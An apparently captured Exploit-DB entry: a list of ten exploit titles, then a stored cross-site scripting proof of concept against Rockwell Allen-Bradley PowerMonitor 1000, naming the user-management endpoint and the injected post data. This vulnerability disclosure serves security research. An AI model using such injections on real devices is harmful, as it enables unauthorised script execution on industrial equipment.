0a4925cc93
10 changes to exploits/shellcodes Mozilla Firefox 63.0.1 - Denial of Service (PoC) Budabot 4.0 - Denial of Service (PoC) CyberArk 9.7 - Memory Disclosure Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection PHP Server Monitor 3.3.1 - Cross-Site Request Forgery Apache Superset 0.23 - Remote Code Execution Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting
21 lines
No EOL
992 B
Text
21 lines
No EOL
992 B
Text
# Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting
|
||
# Date: 2018-11-27
|
||
# Exploit Author: Luca.Chiou
|
||
# Vendor Homepage: https://www.rockwellautomation.com/
|
||
# Version: 1408-EM3A-ENT B
|
||
# Tested on: It is a proprietary devices: https://ab.rockwellautomation.com/zh/Energy-Monitoring/1408-PowerMonitor-1000
|
||
# CVE : N/A
|
||
|
||
# 1. Description:
|
||
# In Rockwell Automation Allen-Bradley PowerMonitor 1000 web page,
|
||
# user can add a new user by access the /Security/Security.shtm.
|
||
# When users add a new user, the new user’s account will in the post data.
|
||
# Attackers can inject malicious XSS code in user’s account parameter of post data.
|
||
# The user’s account parameter will be stored in database, so that cause a stored XSS vulnerability.
|
||
|
||
# 2. Proof of Concept:
|
||
# Browse http://<Your Modem IP>/Security/Security.shtm
|
||
# In page Security.shtm, add a new user
|
||
# Send this post data:
|
||
|
||
/Security/cgi-bin/security|0|0|<script>alert(123)</script> |